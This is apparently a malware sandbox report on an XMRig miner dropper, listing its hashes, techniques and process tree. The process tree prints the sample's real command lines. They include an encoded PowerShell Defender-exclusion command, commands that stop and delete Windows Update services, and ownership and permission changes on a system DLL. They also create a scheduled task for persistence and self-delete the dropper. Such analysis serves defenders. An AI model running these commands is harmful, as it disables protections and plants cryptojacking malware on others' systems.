xmrig | dde77f52e25c661b86b499b40e627512b5713e53744c2bafb57450d7fdac3785

Analysis

max time kernel
151s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
19-05-2022 22:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

script1.exe
Size

7.2MB
MD5

cc45f791667f3b9fb6281414f5325561
SHA1

df8b29bbc15712f928a61f6d0c8e045d823dce84
SHA256

dde77f52e25c661b86b499b40e627512b5713e53744c2bafb57450d7fdac3785
SHA512

f70692b95b4b09d65f5bf4ef5915fccbf2f0628ad206e3fa064b6d595e5176d4e9d89368215b474e0ca95f38bae918fe31f2d64aa9849a9045cd5b4d84ff95d7

Score

10^/10

xmrig discovery evasion exploit miner

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 5 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/1304-195-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral2/memory/1304-229-0x000000014036DB84-mapping.dmp	xmrig
behavioral2/memory/1304-230-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral2/memory/1304-231-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral2/memory/1304-234-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig

Drops file in Drivers directory 2 IoCs

Processes:

script1.exenshost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	script1.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	nshost.exe

Executes dropped EXE 1 IoCs

Processes:

nshost.exe

pid process

4940 nshost.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

icacls.exetakeown.exetakeown.exeicacls.exe

pid process

2000 icacls.exe
4504 takeown.exe
4564 takeown.exe
896 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
4940	nshost.exe

pid	process
2000	icacls.exe
4504	takeown.exe
4564	takeown.exe
896	icacls.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

nshost.exescript1.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	nshost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	script1.exe

Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exetakeown.exetakeown.exeicacls.exe

pid process

2000 icacls.exe
4504 takeown.exe
4564 takeown.exe
896 icacls.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

conhost.exe

pid process

1480 conhost.exe
1480 conhost.exe

pid	process
2000	icacls.exe
4504	takeown.exe
4564	takeown.exe
896	icacls.exe

pid	process
1480	conhost.exe
1480	conhost.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

nshost.exe

description	pid	process	target process
PID 4940 set thread context of 1480	4940	nshost.exe	conhost.exe
PID 4940 set thread context of 1304	4940	nshost.exe	conhost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1732 schtasks.exe

pid	process
1732	schtasks.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
1224	reg.exe
8	reg.exe
4080	reg.exe
4252	reg.exe
5060	reg.exe
4800	reg.exe
4748	reg.exe
4192	reg.exe
1964	reg.exe
4988	reg.exe
2684	reg.exe
4792	reg.exe
4896	reg.exe
3984	reg.exe
1224	reg.exe
5008	reg.exe
4184	reg.exe
4768	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exescript1.exepowershell.exenshost.execonhost.exe

pid	process
448	powershell.exe
448	powershell.exe
3404	script1.exe
3496	powershell.exe
3496	powershell.exe
4940	nshost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe
1304	conhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

644

pid	process
644

Suspicious use of AdjustPrivilegeToken 24 IoCs

Processes:

powershell.exescript1.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exepowershell.exenshost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.execonhost.exe

description	pid	process
Token: SeDebugPrivilege	448	powershell.exe
Token: SeDebugPrivilege	3404	script1.exe
Token: SeShutdownPrivilege	3956	powercfg.exe
Token: SeCreatePagefilePrivilege	3956	powercfg.exe
Token: SeShutdownPrivilege	400	powercfg.exe
Token: SeCreatePagefilePrivilege	400	powercfg.exe
Token: SeShutdownPrivilege	4780	powercfg.exe
Token: SeCreatePagefilePrivilege	4780	powercfg.exe
Token: SeShutdownPrivilege	1656	powercfg.exe
Token: SeCreatePagefilePrivilege	1656	powercfg.exe
Token: SeTakeOwnershipPrivilege	4564	takeown.exe
Token: SeDebugPrivilege	3496	powershell.exe
Token: SeDebugPrivilege	4940	nshost.exe
Token: SeShutdownPrivilege	2512	powercfg.exe
Token: SeCreatePagefilePrivilege	2512	powercfg.exe
Token: SeShutdownPrivilege	5056	powercfg.exe
Token: SeCreatePagefilePrivilege	5056	powercfg.exe
Token: SeShutdownPrivilege	1200	powercfg.exe
Token: SeCreatePagefilePrivilege	1200	powercfg.exe
Token: SeShutdownPrivilege	4608	powercfg.exe
Token: SeCreatePagefilePrivilege	4608	powercfg.exe
Token: SeTakeOwnershipPrivilege	4504	takeown.exe
Token: SeLockMemoryPrivilege	1304	conhost.exe
Token: SeLockMemoryPrivilege	1304	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

script1.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 3404 wrote to memory of 1384	3404	script1.exe	cmd.exe
PID 3404 wrote to memory of 1384	3404	script1.exe	cmd.exe
PID 1384 wrote to memory of 448	1384	cmd.exe	powershell.exe
PID 1384 wrote to memory of 448	1384	cmd.exe	powershell.exe
PID 3404 wrote to memory of 4392	3404	script1.exe	cmd.exe
PID 3404 wrote to memory of 4392	3404	script1.exe	cmd.exe
PID 3404 wrote to memory of 1288	3404	script1.exe	cmd.exe
PID 3404 wrote to memory of 1288	3404	script1.exe	cmd.exe
PID 4392 wrote to memory of 3288	4392	cmd.exe	sc.exe
PID 4392 wrote to memory of 3288	4392	cmd.exe	sc.exe
PID 1288 wrote to memory of 3956	1288	cmd.exe	powercfg.exe
PID 1288 wrote to memory of 3956	1288	cmd.exe	powercfg.exe
PID 4392 wrote to memory of 3004	4392	cmd.exe	sc.exe
PID 4392 wrote to memory of 3004	4392	cmd.exe	sc.exe
PID 1288 wrote to memory of 400	1288	cmd.exe	powercfg.exe
PID 1288 wrote to memory of 400	1288	cmd.exe	powercfg.exe
PID 4392 wrote to memory of 668	4392	cmd.exe	sc.exe
PID 4392 wrote to memory of 668	4392	cmd.exe	sc.exe
PID 1288 wrote to memory of 4780	1288	cmd.exe	powercfg.exe
PID 1288 wrote to memory of 4780	1288	cmd.exe	powercfg.exe
PID 4392 wrote to memory of 1844	4392	cmd.exe	sc.exe
PID 4392 wrote to memory of 1844	4392	cmd.exe	sc.exe
PID 1288 wrote to memory of 1656	1288	cmd.exe	powercfg.exe
PID 1288 wrote to memory of 1656	1288	cmd.exe	powercfg.exe
PID 3404 wrote to memory of 2400	3404	script1.exe	cmd.exe
PID 3404 wrote to memory of 2400	3404	script1.exe	cmd.exe
PID 4392 wrote to memory of 4252	4392	cmd.exe	sc.exe
PID 4392 wrote to memory of 4252	4392	cmd.exe	sc.exe
PID 4392 wrote to memory of 5060	4392	cmd.exe	reg.exe
PID 4392 wrote to memory of 5060	4392	cmd.exe	reg.exe
PID 2400 wrote to memory of 1732	2400	cmd.exe	schtasks.exe
PID 2400 wrote to memory of 1732	2400	cmd.exe	schtasks.exe
PID 4392 wrote to memory of 1224	4392	cmd.exe	reg.exe
PID 4392 wrote to memory of 1224	4392	cmd.exe	reg.exe
PID 4392 wrote to memory of 4988	4392	cmd.exe	reg.exe
PID 4392 wrote to memory of 4988	4392	cmd.exe	reg.exe
PID 4392 wrote to memory of 8	4392	cmd.exe	reg.exe
PID 4392 wrote to memory of 8	4392	cmd.exe	reg.exe
PID 4392 wrote to memory of 4800	4392	cmd.exe	reg.exe
PID 4392 wrote to memory of 4800	4392	cmd.exe	reg.exe
PID 4392 wrote to memory of 4564	4392	cmd.exe	takeown.exe
PID 4392 wrote to memory of 4564	4392	cmd.exe	takeown.exe
PID 4392 wrote to memory of 896	4392	cmd.exe	icacls.exe
PID 4392 wrote to memory of 896	4392	cmd.exe	icacls.exe
PID 4392 wrote to memory of 2684	4392	cmd.exe	reg.exe
PID 4392 wrote to memory of 2684	4392	cmd.exe	reg.exe
PID 4392 wrote to memory of 4792	4392	cmd.exe	reg.exe
PID 4392 wrote to memory of 4792	4392	cmd.exe	reg.exe
PID 4392 wrote to memory of 4896	4392	cmd.exe	reg.exe
PID 4392 wrote to memory of 4896	4392	cmd.exe	reg.exe
PID 4392 wrote to memory of 4080	4392	cmd.exe	reg.exe
PID 4392 wrote to memory of 4080	4392	cmd.exe	reg.exe
PID 4392 wrote to memory of 4380	4392	cmd.exe	schtasks.exe
PID 4392 wrote to memory of 4380	4392	cmd.exe	schtasks.exe
PID 4392 wrote to memory of 4024	4392	cmd.exe	schtasks.exe
PID 4392 wrote to memory of 4024	4392	cmd.exe	schtasks.exe
PID 4392 wrote to memory of 1968	4392	cmd.exe	schtasks.exe
PID 4392 wrote to memory of 1968	4392	cmd.exe	schtasks.exe
PID 4392 wrote to memory of 3084	4392	cmd.exe	schtasks.exe
PID 4392 wrote to memory of 3084	4392	cmd.exe	schtasks.exe
PID 4392 wrote to memory of 1800	4392	cmd.exe	schtasks.exe
PID 4392 wrote to memory of 1800	4392	cmd.exe	schtasks.exe
PID 4392 wrote to memory of 1400	4392	cmd.exe	schtasks.exe
PID 4392 wrote to memory of 1400	4392	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\script1.exe
"C:\Users\Admin\AppData\Local\Temp\script1.exe"
1⤵
- Drops file in Drivers directory
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3404

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AcABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdAB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAcABwAGMAIwA+AA=="
2⤵
- Suspicious use of WriteProcessMemory
PID:1384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAGUAcgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AcABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdAB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAcABwAGMAIwA+AA=="
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:448

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
2⤵
- Suspicious use of WriteProcessMemory
PID:4392

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
PID:3288

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
PID:3004

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
PID:668

C:\Windows\system32\sc.exe
sc stop bits
3⤵
PID:1844

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
PID:4252

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
3⤵
- Modifies registry key
PID:5060

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
3⤵
- Modifies registry key
PID:1224

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
3⤵
- Modifies security service
- Modifies registry key
PID:4988

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
3⤵
- Modifies registry key
PID:8

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
3⤵
- Modifies registry key
PID:4800

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4564

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:896

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:2684

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:4792

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:4896

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:4080

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
3⤵
PID:4380

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
3⤵
PID:4024

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
3⤵
PID:1968

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
3⤵
PID:3084

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
3⤵
PID:1800

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
3⤵
PID:1400

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:1852

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1288

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3956

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:400

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4780

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1656

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /tn "ServiceUpdateTaskMachine" /tr '^"C:\Users\Admin\AppData\Local\Temp\Mircosoft\nshost.exe^"'
2⤵
- Suspicious use of WriteProcessMemory
PID:2400

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "ServiceUpdateTaskMachine" /tr '"C:\Users\Admin\AppData\Local\Temp\Mircosoft\nshost.exe"'
3⤵
- Creates scheduled task(s)
PID:1732

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "ServiceUpdateTaskMachine"
2⤵
PID:2568

C:\Windows\system32\schtasks.exe
schtasks /run /tn "ServiceUpdateTaskMachine"
3⤵
PID:4856

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\script1.exe"
2⤵
PID:1772

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
3⤵
PID:3316

C:\Users\Admin\AppData\Local\Temp\Mircosoft\nshost.exe
C:\Users\Admin\AppData\Local\Temp\Mircosoft\nshost.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4940

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AcABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdAB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAcABwAGMAIwA+AA=="
2⤵
PID:4724

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAGUAcgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AcABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdAB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAcABwAGMAIwA+AA=="
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3496

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
2⤵
PID:4752

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
PID:1692

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
PID:5104

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
PID:560

C:\Windows\system32\sc.exe
sc stop bits
3⤵
PID:1896

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
PID:1124

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
3⤵
- Modifies registry key
PID:4748

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:3984

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
3⤵
PID:5048

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:4840

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
3⤵
PID:3020

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
3⤵
PID:4040

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
3⤵
PID:812

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
3⤵
PID:2364

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
3⤵
PID:2424

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:1224

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:4192

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:4252

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2000

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4504

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
3⤵
- Modifies registry key
PID:5008

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
3⤵
- Modifies registry key
PID:1964

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
3⤵
- Modifies registry key
PID:4184

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
3⤵
- Modifies registry key
PID:4768

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:1180

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2512

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5056

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1200

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4608

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
2⤵
